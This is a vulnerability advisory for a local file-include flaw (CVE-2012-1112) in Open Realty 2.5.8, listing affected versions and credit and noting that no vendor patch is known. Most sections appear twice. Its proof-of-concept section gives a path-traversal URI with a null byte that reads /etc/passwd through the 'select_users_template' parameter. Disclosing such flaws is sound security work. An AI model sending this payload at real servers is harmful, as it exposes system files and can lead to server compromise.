Open Realty 'select_users_template' Parameter Local File Include Vulnerability
BID:52296
Info
Open Realty 'select_users_template' Parameter Local File Include Vulnerability
| Bugtraq ID: | 52296 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-1112 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 05 2012 12:00AM |
| Updated: | Mar 19 2015 07:35AM |
| Credit: | Aung Khant |
| Vulnerable: |
Transparent Technologies Inc Open Realty 2.5.7 Transparent Technologies Inc Open Realty 2.5.8 |
| Not Vulnerable: | |
Discussion
Open Realty 'select_users_template' Parameter Local File Include Vulnerability
Open Realty is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Open Realty version 2.5.8 is vulnerable; other versions may also be affected.
Open Realty is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Open Realty version 2.5.8 is vulnerable; other versions may also be affected.
Exploit / POC
Open Realty 'select_users_template' Parameter Local File Include Vulnerability
Attackers can exploit this issue through a browser.
The following example URI is available:
http://www.example.com/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00
Attackers can exploit this issue through a browser.
The following example URI is available:
http://www.example.com/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00
Solution / Fix
Open Realty 'select_users_template' Parameter Local File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Open Realty 'select_users_template' Parameter Local File Include Vulnerability
References:
References:
- Home page (Transparent Technologies Inc)
- Open-Realty CMS 2.5.8 (2.x.x) <= "select_users_template" Local File Inclusion V (Aung Khant)